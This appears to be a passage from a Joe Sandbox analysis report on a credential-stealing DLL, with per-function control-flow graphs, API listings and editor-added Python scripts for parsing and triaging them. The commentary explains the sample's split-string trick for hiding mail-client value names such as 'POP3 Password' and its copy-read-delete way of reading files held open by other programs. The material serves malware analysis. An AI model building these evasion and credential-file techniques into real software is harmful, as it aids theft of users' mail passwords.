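"""Parse the control_flow_graph edge lists Joe Sandbox prints per function and search
them for an ordered API-call sequence.

Added example, not code from the report. The two edge lists are copied verbatim from the
report entries that begin at blocks 1000c7a7 and 1000c803; the grammar in parse_cfg is
inferred from that listing (an assumption).
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

CFG_1000C7A7 = "control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 96 1000c7fa-1000c7fe 91->96 97 1000c85b-1000c85e 91->97 94 1000c870 92->94 95 1000c866-1000c86b 92->95 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 102 1000c865 96->102 103 1000c800-1000c80b GetProcAddress 96->103 100 1000c85f-1000c860 GetProcAddress 97->100 98->100 99->97 100->102 102->95 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105"
CFG_1000C803 = "control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117"

# The sequence the report's API list shows for this routine: resolve an export, make
# 0x78 bytes writable (VirtualProtect ..., 0x4), then VirtualProtect again.
PATCH_PATTERN = ["GetProcAddress", "VirtualProtect", "VirtualProtect"]

ADDR = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{8})?$", re.IGNORECASE)
EDGE = re.compile(r"^(\d+)->(\d+)$")
BLOCK_ID = re.compile(r"^\d{1,5}$")   # block ids are short decimals; addresses are 8 hex digits


@dataclass
class Block:
    addr: str                                   # "start-end", or a single address
    calls: List[str] = field(default_factory=list)


def parse_cfg(text: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Grammar (inferred from the listing): `<id> <addr>` declares a block, `<a>-><b>` is
    an edge, and any other token annotates the current block: an imported API name,
    `call <addr>` for a subroutine, or `* <n>` meaning the preceding call is repeated."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    cur: Optional[int] = None
    i = 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif BLOCK_ID.match(t) and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            cur = int(t)
            blocks[cur] = Block(toks[i + 1])
            i += 2
        elif cur is None:
            raise ValueError("label %r before any block" % t)
        elif t == "call" and i + 1 < len(toks):
            blocks[cur].calls.append("sub_" + toks[i + 1])
            i += 2
        elif t == "*" and i + 1 < len(toks) and blocks[cur].calls:
            blocks[cur].calls.extend([blocks[cur].calls[-1]] * (int(toks[i + 1]) - 1))
            i += 2
        else:
            blocks[cur].calls.append(t)
            i += 1
    return blocks, edges


def entry_blocks(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> List[int]:
    targets = {dst for _, dst in edges}
    return [b for b in blocks if b not in targets]


def call_sequence(blocks: Dict[int, Block], path: List[int]) -> List[str]:
    return [c for b in path for c in blocks[b].calls]


def find_call_pattern(blocks: Dict[int, Block], edges: List[Tuple[int, int]],
                      pattern: List[str]) -> Optional[List[int]]:
    """Depth-first search for a simple path (no block repeated) whose call sequence contains
    `pattern` as an ordered, not necessarily adjacent, subsequence. Returns that path or None."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)

    def has_subseq(calls: List[str]) -> bool:
        k = 0
        for c in calls:
            if k < len(pattern) and c == pattern[k]:
                k += 1
        return k == len(pattern)

    def dfs(path: List[int]) -> Optional[List[int]]:
        if has_subseq(call_sequence(blocks, path)):
            return path
        for nxt in succ[path[-1]]:
            if nxt not in path:
                found = dfs(path + [nxt])
                if found:
                    return found
        return None

    for start in entry_blocks(blocks, edges) or list(blocks):
        found = dfs([start])
        if found:
            return found
    return None


if __name__ == "__main__":
    for name, text in (("1000c7a7", CFG_1000C7A7), ("1000c803", CFG_1000C803)):
        blocks, edges = parse_cfg(text)
        path = find_call_pattern(blocks, edges, PATCH_PATTERN)
        print(name, path, call_sequence(blocks, path or []))
```

For the first listing the search lands on blocks 103, 104 and 106 (1000c800-1000c82a), which is exactly where the API list places refs 1000C804, 1000C816 and 1000C82A; the same pattern with GetModuleHandleA inserted before GetProcAddress will not match, because in these graphs the module lookup only happens after the VirtualProtect pair.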

Control-flow Graph
control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 152 10001982-10001985 150->152 153 1000184b-1000184e 150->153 151->146 155 10001995-10001999 152->155 156 10001987 152->156 153->152 157 10001854-10001881 call 100044b0 * 2 call 10001db7 153->157 155->150 155->151 159 1000198a-1000198d call 10002c40 156->159 170 10001887-1000189f call 100044b0 call 10001db7 157->170 171 1000193d-10001943 157->171 165 10001992 159->165 165->155 170->171 184 100018a5-100018a8 170->184 172 10001945-10001947 171->172 173 1000197e-10001980 171->173 172->173 175 10001949-1000194b 172->175 173->159 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->165 181 10001951-10001953 178->181 182 10001955-10001957 178->182 181->177 181->182 185 10001959-1000195b 182->185 186 1000195d-1000195f 182->186 188 100018c4-100018dc call 100044b0 call 10001db7 184->188 189 100018aa-100018c2 call 100044b0 call 10001db7 184->189 185->177 185->186 186->173 186->177 188->155 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->155
APIs
  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• _strlen.LIBCMT ref: 10001855
• _strlen.LIBCMT ref: 10001869
• _strlen.LIBCMT ref: 1000188B
• _strlen.LIBCMT ref: 100018AE
• _strlen.LIBCMT ref: 100018C8
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
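The String ID field of this entry lists every string twice and in sorted order: Acco, POP3, Pass, t, un, word. Read together with the five _strlen calls and the CopyFileW/CreateFileW/DeleteFileW subcall, those are the pieces of "Account", "POP3" and "Password" that the code joins at run time so the complete names never sit in the binary, the split-string trick that keeps mail-client profile value names such as "POP3 Password" away from string scanners. Because the report drops the original order, putting the fragments back together has to be an order-independent search against a list of names you care about. The helper below is an added example, not the report's code; the two String ID values are copied from this entry and the one that follows it, and the keyword watchlist is an assumption of the example.

```python
"""Reassemble split strings from a Joe Sandbox "String ID" field.

Added example, not part of the report. STRING_ID_1000173A and STRING_ID_NEXT are copied
from the report (this entry and the next one); WATCHLIST is this example's assumption of
which credential-related names are worth looking for.
"""
from typing import Dict, List, Optional

STRING_ID_1000173A = "Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word"
STRING_ID_NEXT = "%m$~$Gon~$~F@7$~dra"

WATCHLIST = ["Account", "Password", "POP3", "IMAP", "SMTP", "Username", "Login", "Email"]


def fragments(field: str) -> List[str]:
    """The report joins strings with '$' and lists each once per reference; keep one copy
    of every non-empty piece in the order given (which is sorted, not program order)."""
    seen, out = set(), []
    for piece in field.split("$"):
        if piece and piece not in seen:
            seen.add(piece)
            out.append(piece)
    return out


def compose(target: str, pool: List[str]) -> Optional[List[str]]:
    """Backtracking search for an ordered concatenation of pool members equal to target.
    Fragments may be reused ("tt" from a single "t"); every step shortens target, so the
    search terminates. Returns the fragment list, or None if target cannot be built."""
    if not target:
        return []
    for frag in pool:
        if target.startswith(frag):
            rest = compose(target[len(frag):], pool)
            if rest is not None:
                return [frag] + rest
    return None


def reassemble(field: str, watchlist: List[str] = WATCHLIST) -> Dict[str, List[str]]:
    """Map every watchlist word that can be built from the field's fragments to the
    fragments used. Matching is case-sensitive because the fragments carry the case
    the code will concatenate."""
    pool = fragments(field)
    hits: Dict[str, List[str]] = {}
    for word in watchlist:
        parts = compose(word, pool)
        if parts is not None:
            hits[word] = parts
    return hits


def split_only(field: str, watchlist: List[str] = WATCHLIST) -> Dict[str, List[str]]:
    """Only the names that needed two or more fragments: a whole word in the field is just
    a string, a word assembled from pieces is the obfuscation signal."""
    return {w: p for w, p in reassemble(field, watchlist).items() if len(p) > 1}


if __name__ == "__main__":
    for label, value in (("1000173a", STRING_ID_1000173A), ("next entry", STRING_ID_NEXT)):
        print(label, fragments(value), "->", split_only(value))
```

A string that itself contains "$" is cut into smaller fragments by the report's separator, which this search tolerates; what it cannot recover is a name whose pieces are spread over several functions, so run it over the String ID fields of a whole report rather than one entry when the hits look incomplete.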

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

Control-flow Graph
control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 295 10007cfa-10007d0c call 1000571e call 100090ba 288->295 292 10007d17-10007d1a 289->292 293 10007d2f-10007d43 call 1000571e * 2 289->293 296 10007dd4-10007dd8 290->296 297 10007db7-10007dbb 290->297 292->293 298 10007d1c-10007d2e call 1000571e call 100091b8 292->298 300 10007df0-10007dfc 296->300 301 10007dda-10007ddf 296->301 304 10007dd1 297->304 305 10007dbd-10007dc0 297->305 298->293 300->290 311 10007dfe-10007e0b call 1000571e 300->311 308 10007de1-10007de4 301->308 309 10007ded 301->309 304->296 305->304 313 10007dc2-10007dd0 call 1000571e * 2 305->313 308->309 316 10007de6-10007dec call 1000571e 308->316 309->300 313->304 316->309
APIs
• ___free_lconv_mon.LIBCMT ref: 10007D06
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                                                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

Control-flow Graph

APIs
• _free.LIBCMT ref: 100059EA
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 100059F6
• _free.LIBCMT ref: 10005A01
• _free.LIBCMT ref: 10005A0C
• _free.LIBCMT ref: 10005A17
• _free.LIBCMT ref: 10005A22
• _free.LIBCMT ref: 10005A2D
• _free.LIBCMT ref: 10005A38
• _free.LIBCMT ref: 10005A43
• _free.LIBCMT ref: 10005A51
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
• Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
• Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
• Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

Control-flow Graph

APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
• Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
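The per-function listings above (the two LIBCMT free routines, the CopyFileW/CreateFileW/ReadFile/CloseHandle/DeleteFileW routine at 10001D1B, and the GetConsoleCP/WideCharToMultiByte/WriteFile routine that follows) are easier to triage once the "<api>.<module>, ref: <address>" bullets are turned into an ordered call sequence per function. The script below is an added example by the editor, not Joe Sandbox tooling or any export format of the report: it parses a constructed excerpt modelled on the listings on this page (argument lists shortened), drops references to LIBCMT routines because those are the statically linked MSVC C runtime rather than the sample's own logic, and tags each function with heuristic API-order patterns of my own (the "copy-read-delete" and "console-write" tags are not report signatures). It also pulls out the Instruction Fuzzy Hash so the same function can be looked up in other reports.

```python
"""Summarise Joe Sandbox per-function API listings for triage (added example, not report tooling)."""
import re
from dataclasses import dataclass, field

# Constructed excerpt modelled on three listings from this page; argument lists shortened.
REPORT_EXCERPT = """
Control-flow Graph
APIs
• ___free_lconv_mon.LIBCMT ref: 10007D06
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
• _free.LIBCMT ref: 10007CFB
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?), ref: 10005734
Similarity
• Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
Control-flow Graph
APIs
• CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
• DeleteFileW.KERNEL32(?,?,?,00000000), ref: 10001D4B
• GetFileSize.KERNEL32(00000000,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000), ref: 10001D7D
• DeleteFileW.KERNEL32(?,?,?,00000000), ref: 10001D8A
Similarity
• Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
Control-flow Graph
APIs
• GetConsoleCP.KERNEL32 ref: 100094D4
• __fassign.LIBCMT ref: 1000954F
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
Similarity
• Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
"""

# "<api>.<module>[(args)], ref: <address>" as the report prints it; the argument list may be absent.
API_RE = re.compile(r"(?P<api>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FUZZY_RE = re.compile(r"Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-Fa-f]+)")
HEADINGS = {"Control-flow Graph", "APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FunctionListing:
    direct: list = field(default_factory=list)  # (api, module, ref) called from the function body itself
    fuzzy_hash: str = ""                        # Joe Sandbox instruction fuzzy hash, for lookup across reports

    @property
    def label(self) -> str:
        return self.direct[0][2] if self.direct else "?"  # the report names no functions: key by first call site


def parse_listings(text: str) -> list:
    functions, section, current = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            section = line
            if line == "Control-flow Graph":  # every function block opens with this heading
                current = FunctionListing()
                functions.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line.lstrip("• ")
        if section == "APIs" and not body.startswith("Part of subcall"):  # subcall lines belong to callees
            if m := API_RE.search(body):
                current.direct.append((m["api"], m["module"], m["ref"]))
        elif section == "Similarity":
            if m := FUZZY_RE.match(body):
                current.fuzzy_hash = m["hash"]
    return functions


def api_sequence(fn: FunctionListing) -> list:
    """Direct Win32 calls in address order; LIBCMT entries are statically linked CRT internals and are dropped."""
    return [api for api, module, _ in sorted(fn.direct, key=lambda t: int(t[2], 16)) if module != "LIBCMT"]


def in_order(seq: list, pattern: list) -> bool:
    """True when every API in pattern occurs in seq in that relative order (other calls may sit between)."""
    it = iter(seq)
    return all(any(api == want for api in it) for want in pattern)


# Heuristic tags (mine, not Joe Sandbox signatures): an ordered API subsequence and what it usually indicates.
HEURISTICS = [
    ("copy-read-delete", ["CopyFileW", "CreateFileW", "ReadFile", "CloseHandle", "DeleteFileW"],
     "copies a file, reads the copy, deletes it: a common way to read a file another process holds open"),
    ("console-write", ["GetConsoleCP", "WideCharToMultiByte", "WriteFile"],
     "converts to the console code page and writes: the shape of the CRT's console output routine"),
]


def tag_function(fn: FunctionListing) -> list:
    seq = api_sequence(fn)
    tags = [tag for tag, pattern, _ in HEURISTICS if in_order(seq, pattern)]
    if fn.direct and not seq:  # only LIBCMT references: CRT code, low triage priority
        tags.append("crt-only")
    return tags


def triage(text: str) -> dict:
    """Map each function label to its tags, Win32 call sequence and fuzzy hash."""
    return {fn.label: {"tags": tag_function(fn), "calls": api_sequence(fn), "fuzzy_hash": fn.fuzzy_hash}
            for fn in parse_listings(text)}
```

Run `triage(REPORT_EXCERPT)` to get one entry per function: 10007D06 comes back as crt-only, 10001D1B as copy-read-delete, 100094D4 as console-write. The tags are only a starting point: a copy-then-read-then-delete sequence says nothing about which file is copied, so confirm the path argument to CopyFileW in the disassembly before connecting this routine to the credential-theft signatures listed at the top of the report.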

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 381 10009513-1000952a 379->381 382 1000952c-1000953d call 10007c19 379->382 384 10009566-10009575 call 100079e6 381->384 389 10009563-10009565 382->389 390 1000953f-10009542 382->390 384->378 391 1000957b-1000959b WideCharToMultiByte 384->391 389->384 392 10009548-1000955a call 100079e6 390->392 393 10009609-10009628 390->393 391->378 395 100095a1-100095b7 WriteFile 391->395 392->378 399 10009560-10009561 392->399 393->378 397 100095b9-100095ca 395->397 398 1000962a-10009630 GetLastError 395->398 397->378 400 100095cc-100095d0 397->400 398->378 399->391 401 100095d2-100095f0 WriteFile 400->401 402 100095fe-10009601 400->402 401->398 403 100095f2-100095f6 401->403 402->379 404 10009607 402->404 403->378 405 100095f8-100095fb 403->405 404->378 405->402
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                                                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

Control-flow Graph
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
